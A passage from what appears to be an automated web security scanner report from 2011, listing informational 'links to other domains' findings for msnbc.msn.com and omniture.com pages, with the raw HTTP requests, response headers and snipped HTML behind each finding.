<li class="i2 " about="http://www.walletpop.com/2011/02/02/five-ways-to-fix-social-security-before-it-runs-dry/">

<a class="h6" href="http://www.walletpop.com/2011/02/02/five-ways-to-fix-social-security-before-it-runs-dry/">

<span property="dc:title">
...[SNIP]...
<li class="i3 " about="http://www.walletpop.com/2011/02/02/how-the-crisis-in-egypt-will-impact-your-wallet/">

<a class="h6" href="http://www.walletpop.com/2011/02/02/how-the-crisis-in-egypt-will-impact-your-wallet/">

<span property="dc:title">
...[SNIP]...
<li class="i4 " about="http://www.walletpop.com/2011/02/02/i-didnt-get-my-packages-from-sears-help-me-walletpop/">

<a class="h6" href="http://www.walletpop.com/2011/02/02/i-didnt-get-my-packages-from-sears-help-me-walletpop/">

<span property="dc:title">
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.305. http://www.msnbc.msn.com/id/41359879/ns/us_news-life/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41359879/ns/us_news-life/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41359879/ns/us_news-life/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41359879/ns/us_news-life/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.306. http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41363935/ns/world_news-mideastn_africa/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41363935/ns/world_news-mideastn_africa/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nightly.msnbc.com/
http://photoblog.msnbc.com/
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
http://www.slate.com/id/2283409/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41363935/ns/world_news-mideastn_africa/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:03:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 204250

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.msn.com/j/MSNBC/Components/Photo/_new/110201-mubarak-statement-115p.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">

<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41363935/ns/world_news-mideast/n_africa/"></a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41363935/ns/world_news-mideast/n_africa/"></a>
...[SNIP]...
<div class="related" about="http://photoblog.msnbc.com/">
<a href="http://photoblog.msnbc.com/" class="popout">

<div class="art" data="http://msnbcmedia4.msn.com/j/MSNBC/Components/Photo/_new/pb-110202-year-of-rabbit-tease.thumb-m.jpg">
...[SNIP]...
</span>
<a href="http://photoblog.msnbc.com/" class="popout" property="dc:title">
Photoblog
</a>
...[SNIP]...
<div class="related" about="http://photoblog.msnbc.com/">
<a href="http://photoblog.msnbc.com/" class="popout">

<div class="art" data="http://msnbcmedia4.msn.com/j/MSNBC/Components/Photo/_new/pb-110202-year-of-rabbit-tease.thumb-m.jpg">
...[SNIP]...
</span>
<a href="http://photoblog.msnbc.com/" class="popout" property="dc:title">
Photoblog
</a>
...[SNIP]...
<div class="related" about="http://photoblog.msnbc.com/">
<a href="http://photoblog.msnbc.com/" class="popout">

<div class="art" data="http://msnbcmedia4.msn.com/j/MSNBC/Components/Photo/_new/pb-110202-year-of-rabbit-tease.thumb-m.jpg">
...[SNIP]...
</span>
<a href="http://photoblog.msnbc.com/" class="popout" property="dc:title">
Photoblog
</a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i5 " about="http://www.slate.com/id/2283409/">

<a class="h6" href="http://www.slate.com/id/2283409/">

<span property="dc:title">
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.307. http://www.msnbc.msn.com/id/41365053/ns/weather/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.msn.com
Path:	/id/41365053/ns/weather/

Issue detail

The page was loaded from a URL containing a query string:

http://www.msnbc.msn.com/id/41365053/ns/weather/?GT1=43001

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://dateline.msnbc.com/
http://hardball.msnbc.com/
http://msn.whitepages.com/
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=9445
http://msnbc.weather.com/activities/travel/businesstraveler/?par=msnbc&site=msnbcPFP&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=PFP&cm_ite=BusinessTraveler
http://msnbc.weather.com/outlook/events/nfl/schedule?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SportingEvents
http://msnbc.weather.com/traffic?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Traffic
http://mtp.msnbc.com/
http://nbcsports.msnbc.com/
http://nbcsports.msnbc.com/id/41369636/ns/nfl/
http://nightly.msnbc.com/
http://preview.weather.com/newscenter/alerts/national/severeWxAlertsNational.html/?par=msnbc&site=www.msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Other
http://rachel.msnbc.com/
http://service.collarity.com/cust/msnbc/ucs.js
http://today.msnbc.com/
http://tv.msnbc.com/
http://twitter.com/share
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.breakingnews.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.hotmail.com/
http://www.newsvine.com/
http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif
http://www.weather.com/?par=decpromo&site=msnbc.com&cm_ven=DECPROMO&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=HomePage
http://www.weather.com/maps/maptype/currentweatherusnational/uscurrentsnowcover_large.html?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SkiMaps
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /id/41365053/ns/weather/?GT1=43001 HTTP/1.1
Host: www.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Wed, 02 Feb 2011 16:03:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com
Content-Length: 136524

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia3.msn.com/j/MSNBC/Components/Video/110201/nn_05kti_storm_110201.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
<noscript>
<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1?" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
<a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="i6 " grid="38129929">

<a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41365053/ns/weather/"></a>
...[SNIP]...
<div class="img">
<a href="http://www.breakingnews.com/"
rel="media:image enclosure" type="image/jpeg">
<img alt="" src="http://msnbcmedia1.msn.com/j/MSNBC/Sections/NEWS/nowMsnbc/FeaturedAccounts/BreakingNews/BreakingNews.grid-2x2.jpg" width="142" height="106" class="photo" />
...[SNIP]...
</div>
<a class="h6" href="http://www.breakingnews.com/">

<span property="dc:title">
...[SNIP]...
<div class="img">
<a href="http://www.weather.com/?par=decpromo&site=msnbc.com&cm_ven=DECPROMO&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=HomePage"
rel="media:image enclosure" type="image/jpeg">
<img alt="" src="http://msnbcmedia1.msn.com/j/MSNBC/Components/Photo/_new/TWCrgb300url.grid-2x2.JPG" width="142" height="134" class="photo" />
...[SNIP]...
</div>
<a class="h6" href="http://www.weather.com/?par=decpromo&site=msnbc.com&cm_ven=DECPROMO&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=HomePage">

<span property="dc:title">
...[SNIP]...
<li class="i2 " about="http://www.weather.com/?par=decpromo&site=msnbc.com&cm_ven=DECPROMO&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=HomePage">

<a class="h6" href="http://www.weather.com/?par=decpromo&site=msnbc.com&cm_ven=DECPROMO&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=HomePage">

<span property="dc:title">
...[SNIP]...
" about="http://preview.weather.com/newscenter/alerts/national/severeWxAlertsNational.html/?par=msnbc&site=www.msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Other">

<a class="h6" href="http://preview.weather.com/newscenter/alerts/national/severeWxAlertsNational.html/?par=msnbc&site=www.msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Other">

<span property="dc:title">
...[SNIP]...
ut="http://www.weather.com/maps/maptype/currentweatherusnational/uscurrentsnowcover_large.html?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SkiMaps">

<a class="h6" href="http://www.weather.com/maps/maptype/currentweatherusnational/uscurrentsnowcover_large.html?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SkiMaps">

<span property="dc:title">
...[SNIP]...
<li class="i5 " about="http://msnbc.weather.com/activities/travel/businesstraveler/?par=msnbc&site=msnbcPFP&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=PFP&cm_ite=BusinessTraveler">

<a class="h6" href="http://msnbc.weather.com/activities/travel/businesstraveler/?par=msnbc&site=msnbcPFP&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=PFP&cm_ite=BusinessTraveler">

<span property="dc:title">
...[SNIP]...
<li class="i6 " about="http://msnbc.weather.com/outlook/events/nfl/schedule?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SportingEvents">

<a class="h6" href="http://msnbc.weather.com/outlook/events/nfl/schedule?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=SportingEvents">

<span property="dc:title">
...[SNIP]...
<li class="i7 " about="http://msnbc.weather.com/traffic?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Traffic">

<a class="h6" href="http://msnbc.weather.com/traffic?par=msnbc&site=msnbc.com&promo=0&cm_ven=MSNBC&cm_cat=www.msnbc.com&cm_pla=WxFront&cm_ite=Traffic">

<span property="dc:title">
...[SNIP]...
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.msn.com/id/41365053/ns/weather/"></a>
...[SNIP]...
<p class="meta"><a href="http://www.newsvine.com/" class="jump count">Discussion comments</a>
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" class="jump">View all <span class="count">
...[SNIP]...
<div>
<a href="http://www.newsvine.com/" title="Add your comment on Newsvine" class="jump">Leave your comment</a>
...[SNIP]...
<div class="img">
<a href="http://www.newsvine.com" title="Add your profile on Newsvine">
<img src="http://www.polls.newsvine.com/_vine/images/av/60x60/vine.gif" width="60" height="60" alt="Add your profile on Newsvine" />
</a>
...[SNIP]...
<li class="i5 " about="http://nbcsports.msnbc.com/id/41369636/ns/nfl/">

<a class="h6" href="http://nbcsports.msnbc.com/id/41369636/ns/nfl/">

<span property="dc:title">
...[SNIP]...
<li><a href="http://nbcsports.msnbc.com/">Sports</a>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
<li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a></li>
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a></li>
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a></li>
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a></li>
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=9445"></script>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

17.308. http://www.omniture.com/en/privacy/2o7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/privacy/2o7

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/en/privacy/2o7?f=2o7

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?
http://twitter.com/OmnitureEMEA
http://twitter.com/omniture
http://twitter.com/omniturecare
http://www.facebook.com/omniture

Request

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 15:39:24 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 15:39:24 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:39:24 GMT
Connection: close
Set-Cookie: omniture_unique=c4b47f0affb47cea2cd263f6285f016c; path=/; domain=omniture.com
Set-Cookie: cms_site_lang=1; expires=Fri, 04-Mar-2011 15:39:24 GMT; path=/; domain=omniture.com
Set-Cookie: use207=7; path=/; domain=omniture.com
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 15:39:24 GMT; path=/; domain=omniture.com
Content-Length: 23935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Privacy - 2o7.net Expl
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...
<li><a href='http://twitter.com/omniture' target="_blank">Twitter: Omniture Updates</a>
...[SNIP]...
<li><a href='http://twitter.com/omniturecare' target="_blank">Twitter: Omniture ClientCare</a>
...[SNIP]...
<li><a href='http://twitter.com/OmnitureEMEA' target="_blank">Twitter: Omniture Europe</a>
...[SNIP]...
<li><a href='http://www.facebook.com/omniture' target="_blank">Facebook</a>
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.309. http://www.omniture.com/en/product_tours/form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/product_tours/form

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/en/product_tours/form?dest=product_tours/search_center

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /en/product_tours/form?dest=product_tours/search_center HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:51:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:51:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:51:13 GMT
Content-Length: 14154
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:51:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Products Tours & Add
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.310. http://www.omniture.com/offer/100 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
